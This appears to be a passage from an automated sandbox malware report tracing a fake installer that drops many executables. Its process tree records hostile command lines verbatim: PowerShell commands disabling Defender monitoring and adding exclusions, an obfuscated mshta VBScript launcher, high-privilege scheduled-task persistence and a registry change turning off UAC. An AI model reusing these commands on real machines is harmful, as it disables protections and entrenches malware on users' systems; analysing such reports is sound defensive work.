Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | WaaSMedicAgent.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | WaaSMedicAgent.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | WaaSMedicAgent.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | WaaSMedicAgent.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | WaaSMedicAgent.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | WaaSMedicAgent.exe
-
Modifies registry class 5 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | Explorer.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | Explorer.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ | Explorer.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | Explorer.EXE
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid | process
2664 | powershell.exe
2664 | powershell.exe
2264 | powershell.exe
2264 | powershell.exe
3788 | Sat016e74da9cbf1.exe
3788 | Sat016e74da9cbf1.exe
3788 | Sat016e74da9cbf1.exe
3788 | Sat016e74da9cbf1.exe
3788 | Sat016e74da9cbf1.exe
3788 | Sat016e74da9cbf1.exe
3788 | Sat016e74da9cbf1.exe
3788 | Sat016e74da9cbf1.exe
3788 | Sat016e74da9cbf1.exe
3788 | Sat016e74da9cbf1.exe
3788 | Sat016e74da9cbf1.exe
3788 | Sat016e74da9cbf1.exe
3788 | Sat016e74da9cbf1.exe
3788 | Sat016e74da9cbf1.exe
3788 | Sat016e74da9cbf1.exe
3788 | Sat016e74da9cbf1.exe
3788 | Sat016e74da9cbf1.exe
3788 | Sat016e74da9cbf1.exe
3788 | Sat016e74da9cbf1.exe
3788 | Sat016e74da9cbf1.exe
3788 | Sat016e74da9cbf1.exe
3788 | Sat016e74da9cbf1.exe
3788 | Sat016e74da9cbf1.exe
3788 | Sat016e74da9cbf1.exe
3788 | Sat016e74da9cbf1.exe
3788 | Sat016e74da9cbf1.exe
3788 | Sat016e74da9cbf1.exe
3788 | Sat016e74da9cbf1.exe
4872 | Sat0188dba58af938.exe
3788 | Sat016e74da9cbf1.exe
4872 | Sat0188dba58af938.exe
3788 | Sat016e74da9cbf1.exe
4872 | Sat0188dba58af938.exe
4872 | Sat0188dba58af938.exe
4872 | Sat0188dba58af938.exe
4872 | Sat0188dba58af938.exe
3788 | Sat016e74da9cbf1.exe
4872 | Sat0188dba58af938.exe
4872 | Sat0188dba58af938.exe
3788 | Sat016e74da9cbf1.exe
4872 | Sat0188dba58af938.exe
4872 | Sat0188dba58af938.exe
4872 | Sat0188dba58af938.exe
4872 | Sat0188dba58af938.exe
3788 | Sat016e74da9cbf1.exe
3788 | Sat016e74da9cbf1.exe
3788 | Sat016e74da9cbf1.exe
3788 | Sat016e74da9cbf1.exe
4872 | Sat0188dba58af938.exe
4872 | Sat0188dba58af938.exe
3788 | Sat016e74da9cbf1.exe
3788 | Sat016e74da9cbf1.exe
4872 | Sat0188dba58af938.exe
4872 | Sat0188dba58af938.exe
3788 | Sat016e74da9cbf1.exe
3788 | Sat016e74da9cbf1.exe
4872 | Sat0188dba58af938.exe
4872 | Sat0188dba58af938.exe
3788 | Sat016e74da9cbf1.exe
3788 | Sat016e74da9cbf1.exe
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid | process
3196 | Explorer.EXE
-
Suspicious behavior: MapViewOfSection 9 IoCs
Processes:
pid | process
3372 | okMapBnuwoKkFkv6DNJnxaAd.exe
3372 | okMapBnuwoKkFkv6DNJnxaAd.exe
3372 | okMapBnuwoKkFkv6DNJnxaAd.exe
7024 | LRSqKfZCaNZ_zXzXGAw7tCbk.exe
6956 | cmstp.exe
6956 | cmstp.exe
6956 | cmstp.exe
6956 | cmstp.exe
5388 | D6C9.exe
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
Processes:
pid | process
7388 | msedge.exe
7388 | msedge.exe
7388 | msedge.exe
7388 | msedge.exe
7388 | msedge.exe
7388 | msedge.exe
7388 | msedge.exe
7388 | msedge.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
description | pid | process
Token: SeShutdownPrivilege | 2432 | svchost.exe
Token: SeCreatePagefilePrivilege | 2432 | svchost.exe
Token: SeShutdownPrivilege | 2432 | svchost.exe
Token: SeCreatePagefilePrivilege | 2432 | svchost.exe
Token: SeShutdownPrivilege | 2432 | svchost.exe
Token: SeCreatePagefilePrivilege | 2432 | svchost.exe
Token: SeCreateTokenPrivilege | 4692 | Sat01e3b3e0fa80800c.exe
Token: SeAssignPrimaryTokenPrivilege | 4692 | Sat01e3b3e0fa80800c.exe
Token: SeLockMemoryPrivilege | 4692 | Sat01e3b3e0fa80800c.exe
Token: SeIncreaseQuotaPrivilege | 4692 | Sat01e3b3e0fa80800c.exe
Token: SeMachineAccountPrivilege | 4692 | Sat01e3b3e0fa80800c.exe
Token: SeTcbPrivilege | 4692 | Sat01e3b3e0fa80800c.exe
Token: SeSecurityPrivilege | 4692 | Sat01e3b3e0fa80800c.exe
Token: SeTakeOwnershipPrivilege | 4692 | Sat01e3b3e0fa80800c.exe
Token: SeLoadDriverPrivilege | 4692 | Sat01e3b3e0fa80800c.exe
Token: SeSystemProfilePrivilege | 4692 | Sat01e3b3e0fa80800c.exe
Token: SeSystemtimePrivilege | 4692 | Sat01e3b3e0fa80800c.exe
Token: SeProfSingleProcessPrivilege | 4692 | Sat01e3b3e0fa80800c.exe
Token: SeIncBasePriorityPrivilege | 4692 | Sat01e3b3e0fa80800c.exe
Token: SeCreatePagefilePrivilege | 4692 | Sat01e3b3e0fa80800c.exe
Token: SeCreatePermanentPrivilege | 4692 | Sat01e3b3e0fa80800c.exe
Token: SeBackupPrivilege | 4692 | Sat01e3b3e0fa80800c.exe
Token: SeRestorePrivilege | 4692 | Sat01e3b3e0fa80800c.exe
Token: SeShutdownPrivilege | 4692 | Sat01e3b3e0fa80800c.exe
Token: SeDebugPrivilege | 4692 | Sat01e3b3e0fa80800c.exe
Token: SeAuditPrivilege | 4692 | Sat01e3b3e0fa80800c.exe
Token: SeSystemEnvironmentPrivilege | 4692 | Sat01e3b3e0fa80800c.exe
Token: SeChangeNotifyPrivilege | 4692 | Sat01e3b3e0fa80800c.exe
Token: SeRemoteShutdownPrivilege | 4692 | Sat01e3b3e0fa80800c.exe
Token: SeUndockPrivilege | 4692 | Sat01e3b3e0fa80800c.exe
Token: SeSyncAgentPrivilege | 4692 | Sat01e3b3e0fa80800c.exe
Token: SeEnableDelegationPrivilege | 4692 | Sat01e3b3e0fa80800c.exe
Token: SeManageVolumePrivilege | 4692 | Sat01e3b3e0fa80800c.exe
Token: SeImpersonatePrivilege | 4692 | Sat01e3b3e0fa80800c.exe
Token: SeCreateGlobalPrivilege | 4692 | Sat01e3b3e0fa80800c.exe
Token: 31 | 4692 | Sat01e3b3e0fa80800c.exe
Token: 32 | 4692 | Sat01e3b3e0fa80800c.exe
Token: 33 | 4692 | Sat01e3b3e0fa80800c.exe
Token: 34 | 4692 | Sat01e3b3e0fa80800c.exe
Token: 35 | 4692 | Sat01e3b3e0fa80800c.exe
Token: SeDebugPrivilege | 5092 | Sat01b537da2e0af175a.exe
Token: SeDebugPrivilege | 2664 | powershell.exe
Token: SeDebugPrivilege | 2264 | powershell.exe
Token: SeShutdownPrivilege | 4308 | svchost.exe
Token: SeCreatePagefilePrivilege | 4308 | svchost.exe
Token: SeDebugPrivilege | 4936 | Sat01c5002407.exe
Token: SeCreateTokenPrivilege | 5700 | nYM_HzkzBazNv3s7A45da1FV.exe
Token: SeAssignPrimaryTokenPrivilege | 5700 | nYM_HzkzBazNv3s7A45da1FV.exe
Token: SeLockMemoryPrivilege | 5700 | nYM_HzkzBazNv3s7A45da1FV.exe
Token: SeIncreaseQuotaPrivilege | 5700 | nYM_HzkzBazNv3s7A45da1FV.exe
Token: SeMachineAccountPrivilege | 5700 | nYM_HzkzBazNv3s7A45da1FV.exe
Token: SeTcbPrivilege | 5700 | nYM_HzkzBazNv3s7A45da1FV.exe
Token: SeSecurityPrivilege | 5700 | nYM_HzkzBazNv3s7A45da1FV.exe
Token: SeTakeOwnershipPrivilege | 5700 | nYM_HzkzBazNv3s7A45da1FV.exe
Token: SeLoadDriverPrivilege | 5700 | nYM_HzkzBazNv3s7A45da1FV.exe
Token: SeSystemProfilePrivilege | 5700 | nYM_HzkzBazNv3s7A45da1FV.exe
Token: SeSystemtimePrivilege | 5700 | nYM_HzkzBazNv3s7A45da1FV.exe
Token: SeProfSingleProcessPrivilege | 5700 | nYM_HzkzBazNv3s7A45da1FV.exe
Token: SeIncBasePriorityPrivilege | 5700 | nYM_HzkzBazNv3s7A45da1FV.exe
Token: SeCreatePagefilePrivilege | 5700 | nYM_HzkzBazNv3s7A45da1FV.exe
Token: SeCreatePermanentPrivilege | 5700 | nYM_HzkzBazNv3s7A45da1FV.exe
Token: SeBackupPrivilege | 5700 | nYM_HzkzBazNv3s7A45da1FV.exe
Token: SeRestorePrivilege | 5700 | nYM_HzkzBazNv3s7A45da1FV.exe
Token: SeShutdownPrivilege | 5700 | nYM_HzkzBazNv3s7A45da1FV.exe
-
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
pid | process
3088 | mshta.exe
7388 | msedge.exe
4176 | Calculator.exe
-
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid | process
3196 | Explorer.EXE
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description | pid | process | target process
PID 1648 wrote to memory of 4344 | 1648 | setup_x86_x64_install.exe | setup_installer.exe
PID 1648 wrote to memory of 4344 | 1648 | setup_x86_x64_install.exe | setup_installer.exe
PID 1648 wrote to memory of 4344 | 1648 | setup_x86_x64_install.exe | setup_installer.exe
PID 4344 wrote to memory of 1436 | 4344 | setup_installer.exe | setup_install.exe
PID 4344 wrote to memory of 1436 | 4344 | setup_installer.exe | setup_install.exe
PID 4344 wrote to memory of 1436 | 4344 | setup_installer.exe | setup_install.exe
PID 1436 wrote to memory of 2148 | 1436 | setup_install.exe | cmd.exe
PID 1436 wrote to memory of 2148 | 1436 | setup_install.exe | cmd.exe
PID 1436 wrote to memory of 2148 | 1436 | setup_install.exe | cmd.exe
PID 1436 wrote to memory of 444 | 1436 | setup_install.exe | cmd.exe
PID 1436 wrote to memory of 444 | 1436 | setup_install.exe | cmd.exe
PID 1436 wrote to memory of 444 | 1436 | setup_install.exe | cmd.exe
PID 444 wrote to memory of 2664 | 444 | cmd.exe | powershell.exe
PID 444 wrote to memory of 2664 | 444 | cmd.exe | powershell.exe
PID 444 wrote to memory of 2664 | 444 | cmd.exe | powershell.exe
PID 2148 wrote to memory of 2264 | 2148 | cmd.exe | powershell.exe
PID 2148 wrote to memory of 2264 | 2148 | cmd.exe | powershell.exe
PID 2148 wrote to memory of 2264 | 2148 | cmd.exe | powershell.exe
PID 1436 wrote to memory of 5000 | 1436 | setup_install.exe | cmd.exe
PID 1436 wrote to memory of 5000 | 1436 | setup_install.exe | cmd.exe
PID 1436 wrote to memory of 5000 | 1436 | setup_install.exe | cmd.exe
PID 1436 wrote to memory of 3340 | 1436 | setup_install.exe | cmd.exe
PID 1436 wrote to memory of 3340 | 1436 | setup_install.exe | cmd.exe
PID 1436 wrote to memory of 3340 | 1436 | setup_install.exe | cmd.exe
PID 1436 wrote to memory of 4040 | 1436 | setup_install.exe | cmd.exe
PID 1436 wrote to memory of 4040 | 1436 | setup_install.exe | cmd.exe
PID 1436 wrote to memory of 4040 | 1436 | setup_install.exe | cmd.exe
PID 1436 wrote to memory of 4832 | 1436 | setup_install.exe | cmd.exe
PID 1436 wrote to memory of 4832 | 1436 | setup_install.exe | cmd.exe
PID 1436 wrote to memory of 4832 | 1436 | setup_install.exe | cmd.exe
PID 1436 wrote to memory of 2824 | 1436 | setup_install.exe | cmd.exe
PID 1436 wrote to memory of 2824 | 1436 | setup_install.exe | cmd.exe
PID 1436 wrote to memory of 2824 | 1436 | setup_install.exe | cmd.exe
PID 1436 wrote to memory of 3412 | 1436 | setup_install.exe | cmd.exe
PID 1436 wrote to memory of 3412 | 1436 | setup_install.exe | cmd.exe
PID 1436 wrote to memory of 3412 | 1436 | setup_install.exe | cmd.exe
PID 1436 wrote to memory of 3988 | 1436 | setup_install.exe | cmd.exe
PID 1436 wrote to memory of 3988 | 1436 | setup_install.exe | cmd.exe
PID 1436 wrote to memory of 3988 | 1436 | setup_install.exe | cmd.exe
PID 1436 wrote to memory of 4208 | 1436 | setup_install.exe | cmd.exe
PID 1436 wrote to memory of 4208 | 1436 | setup_install.exe | cmd.exe
PID 1436 wrote to memory of 4208 | 1436 | setup_install.exe | cmd.exe
PID 1436 wrote to memory of 4376 | 1436 | setup_install.exe | cmd.exe
PID 1436 wrote to memory of 4376 | 1436 | setup_install.exe | cmd.exe
PID 1436 wrote to memory of 4376 | 1436 | setup_install.exe | cmd.exe
PID 4040 wrote to memory of 5092 | 4040 | cmd.exe | Sat01b537da2e0af175a.exe
PID 4040 wrote to memory of 5092 | 4040 | cmd.exe | Sat01b537da2e0af175a.exe
PID 1436 wrote to memory of 5056 | 1436 | setup_install.exe | cmd.exe
PID 1436 wrote to memory of 5056 | 1436 | setup_install.exe | cmd.exe
PID 1436 wrote to memory of 5056 | 1436 | setup_install.exe | cmd.exe
PID 3340 wrote to memory of 3160 | 3340 | cmd.exe | Sat01866e4ba0024d.exe
PID 3340 wrote to memory of 3160 | 3340 | cmd.exe | Sat01866e4ba0024d.exe
PID 3340 wrote to memory of 3160 | 3340 | cmd.exe | Sat01866e4ba0024d.exe
PID 2824 wrote to memory of 4872 | 2824 | cmd.exe | Sat0188dba58af938.exe
PID 2824 wrote to memory of 4872 | 2824 | cmd.exe | Sat0188dba58af938.exe
PID 2824 wrote to memory of 4872 | 2824 | cmd.exe | Sat0188dba58af938.exe
PID 5000 wrote to memory of 3788 | 5000 | cmd.exe | Sat016e74da9cbf1.exe
PID 5000 wrote to memory of 3788 | 5000 | cmd.exe | Sat016e74da9cbf1.exe
PID 5000 wrote to memory of 3788 | 5000 | cmd.exe | Sat016e74da9cbf1.exe
PID 1436 wrote to memory of 1968 | 1436 | setup_install.exe | cmd.exe
PID 1436 wrote to memory of 1968 | 1436 | setup_install.exe | cmd.exe
PID 1436 wrote to memory of 1968 | 1436 | setup_install.exe | cmd.exe
PID 1436 wrote to memory of 4828 | 1436 | setup_install.exe | cmd.exe
PID 1436 wrote to memory of 4828 | 1436 | setup_install.exe | cmd.exe
-
System policy modification 1 TTPs 1 IoCs
Processes:
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | 569C.exe
Processes
(each entry: image path, tree depth, the command line as executed, then the behaviours attributed to that process)
- C:\Windows\Explorer.EXE (depth 1)
  Command line: C:\Windows\Explorer.EXE
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of UnmapMainImage
- C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe (depth 2)
  Command line: "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
  - Suspicious use of WriteProcessMemory
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe (depth 3)
  Command line: "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
- C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\setup_install.exe (depth 4)
  Command line: "C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\setup_install.exe"
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
- C:\Windows\SysWOW64\cmd.exe (depth 5)
  Command line: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
  - Suspicious use of WriteProcessMemory
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 6)
  Command line: powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\SysWOW64\cmd.exe (depth 5)
  Command line: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
  - Suspicious use of WriteProcessMemory
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 6)
  Command line: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\SysWOW64\cmd.exe (depth 5)
  Command line: C:\Windows\system32\cmd.exe /c Sat016e74da9cbf1.exe
  - Suspicious use of WriteProcessMemory
- C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat016e74da9cbf1.exe (depth 6)
  Command line: Sat016e74da9cbf1.exe
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
- C:\Users\Admin\Pictures\Adobe Films\e5H4avJGAknZvvCppg0GFVNM.exe (depth 7)
  Command line: "C:\Users\Admin\Pictures\Adobe Films\e5H4avJGAknZvvCppg0GFVNM.exe"
  - Executes dropped EXE
- C:\Users\Admin\Pictures\Adobe Films\6ltbOXKT_ifPZ3wV_9gaAgR_.exe (depth 7)
  Command line: "C:\Users\Admin\Pictures\Adobe Films\6ltbOXKT_ifPZ3wV_9gaAgR_.exe"
  - Executes dropped EXE
- C:\Users\Admin\Pictures\Adobe Films\o9uSZntIwqe93u3YXgjwODAp.exe (depth 7)
  Command line: "C:\Users\Admin\Pictures\Adobe Films\o9uSZntIwqe93u3YXgjwODAp.exe"
  - Executes dropped EXE
  - Drops file in Program Files directory
- C:\Windows\SysWOW64\schtasks.exe (depth 8)
  Command line: schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
  - Creates scheduled task(s)
- C:\Windows\SysWOW64\schtasks.exe (depth 8)
  Command line: schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
  - Creates scheduled task(s)
- C:\Users\Admin\Documents\X4IAaOgGcZikswnm7TOgIOSW.exe (depth 8)
  Command line: "C:\Users\Admin\Documents\X4IAaOgGcZikswnm7TOgIOSW.exe"
- C:\Users\Admin\Pictures\Adobe Films\nYM_HzkzBazNv3s7A45da1FV.exe (depth 9)
  Command line: "C:\Users\Admin\Pictures\Adobe Films\nYM_HzkzBazNv3s7A45da1FV.exe"
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
- C:\Users\Admin\Pictures\Adobe Films\zYdlxzTOubkxt6qsS_obRu5x.exe (depth 9)
  Command line: "C:\Users\Admin\Pictures\Adobe Films\zYdlxzTOubkxt6qsS_obRu5x.exe"
- C:\Windows\SysWOW64\WerFault.exe (depth 10)
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 8048 -s 236
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
- C:\Users\Admin\Pictures\Adobe Films\28Fes2YSzGb2vczE9pkmn4AA.exe (depth 9)
  Command line: "C:\Users\Admin\Pictures\Adobe Films\28Fes2YSzGb2vczE9pkmn4AA.exe"
- C:\Windows\SysWOW64\WerFault.exe (depth 10)
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 8024 -s 240
  - Program crash
- C:\Users\Admin\Pictures\Adobe Films\4WqjhvnE_nWs2qhNwdMkZgn0.exe (depth 9)
  Command line: "C:\Users\Admin\Pictures\Adobe Films\4WqjhvnE_nWs2qhNwdMkZgn0.exe"
- C:\Windows\SysWOW64\mshta.exe (depth 10)
  Command line: "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\4WqjhvnE_nWs2qhNwdMkZgn0.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\4WqjhvnE_nWs2qhNwdMkZgn0.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
- C:\Windows\SysWOW64\cmd.exe (depth 11)
  Command line: "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\4WqjhvnE_nWs2qhNwdMkZgn0.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\4WqjhvnE_nWs2qhNwdMkZgn0.exe" ) do taskkill -f -iM "%~NxM"
- C:\Windows\SysWOW64\taskkill.exe (depth 12)
  Command line: taskkill -f -iM "4WqjhvnE_nWs2qhNwdMkZgn0.exe"
  - Kills process with taskkill
- C:\Users\Admin\Pictures\Adobe Films\ct7RBygn1rP1ckYHc9QoXLS3.exe (depth 9)
  Command line: "C:\Users\Admin\Pictures\Adobe Films\ct7RBygn1rP1ckYHc9QoXLS3.exe"
- C:\Users\Admin\Pictures\Adobe Films\11Uka6VhuG8aNccyUNPMKjhJ.exe (depth 9)
  Command line: "C:\Users\Admin\Pictures\Adobe Films\11Uka6VhuG8aNccyUNPMKjhJ.exe"
- C:\Users\Admin\Pictures\Adobe Films\shgBWCefQthWMZ9bzKCaG8Jr.exe (depth 9)
  Command line: "C:\Users\Admin\Pictures\Adobe Films\shgBWCefQthWMZ9bzKCaG8Jr.exe"
- C:\Users\Admin\AppData\Roaming\Calculator\setup.exe (depth 10)
  Command line: C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
  - Loads dropped DLL
  - Adds Run key to start application
- C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe (depth 11)
  Command line: "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"
  - Loads dropped DLL
  - Checks processor information in registry
  - Enumerates system info in registry
- C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe (depth 12)
  Command line: C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x208,0x20c,0x210,0x1e4,0x214,0x7ff86290dec0,0x7ff86290ded0,0x7ff86290dee0
- C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe (depth 13)
  Command line: C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff7baac9e70,0x7ff7baac9e80,0x7ff7baac9e90
- C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe (depth 12)
  Command line: "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1704,5350433864775299725,6792876898391423959,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1500_1764078621" --mojo-platform-channel-handle=1768 /prefetch:8
- C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe (depth 12)
  Command line: "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1704,5350433864775299725,6792876898391423959,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1500_1764078621" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1720 /prefetch:2
- C:\Users\Admin\Pictures\Adobe Films\hbmssEj0o1Sjtg9efIzhu9Cj.exe (depth 9)
  Command line: "C:\Users\Admin\Pictures\Adobe Films\hbmssEj0o1Sjtg9efIzhu9Cj.exe"
- C:\Users\Admin\AppData\Local\Temp\is-UR4VL.tmp\hbmssEj0o1Sjtg9efIzhu9Cj.tmp (depth 10)
  Command line: "C:\Users\Admin\AppData\Local\Temp\is-UR4VL.tmp\hbmssEj0o1Sjtg9efIzhu9Cj.tmp" /SL5="$7024E,506127,422400,C:\Users\Admin\Pictures\Adobe Films\hbmssEj0o1Sjtg9efIzhu9Cj.exe"
- Loads dropped DLL
-
C:\Users\Admin\Pictures\Adobe Films\Vgb9MSUHJnGgHNOrMsbi_BKX.exe"C:\Users\Admin\Pictures\Adobe Films\Vgb9MSUHJnGgHNOrMsbi_BKX.exe"7⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\LF6wUUS4Bh5t4GsH_50X1G6X.exe"C:\Users\Admin\Pictures\Adobe Films\LF6wUUS4Bh5t4GsH_50X1G6X.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\FOGl6ElFqFbTpkovg9hhVPi3.exe"C:\Users\Admin\Pictures\Adobe Films\FOGl6ElFqFbTpkovg9hhVPi3.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4788 -s 2008⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\Vnbdvi08mAvQMZ57cLQirs_r.exe"C:\Users\Admin\Pictures\Adobe Films\Vnbdvi08mAvQMZ57cLQirs_r.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat01866e4ba0024d.exe /mixone5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01866e4ba0024d.exeSat01866e4ba0024d.exe /mixone6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 2407⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
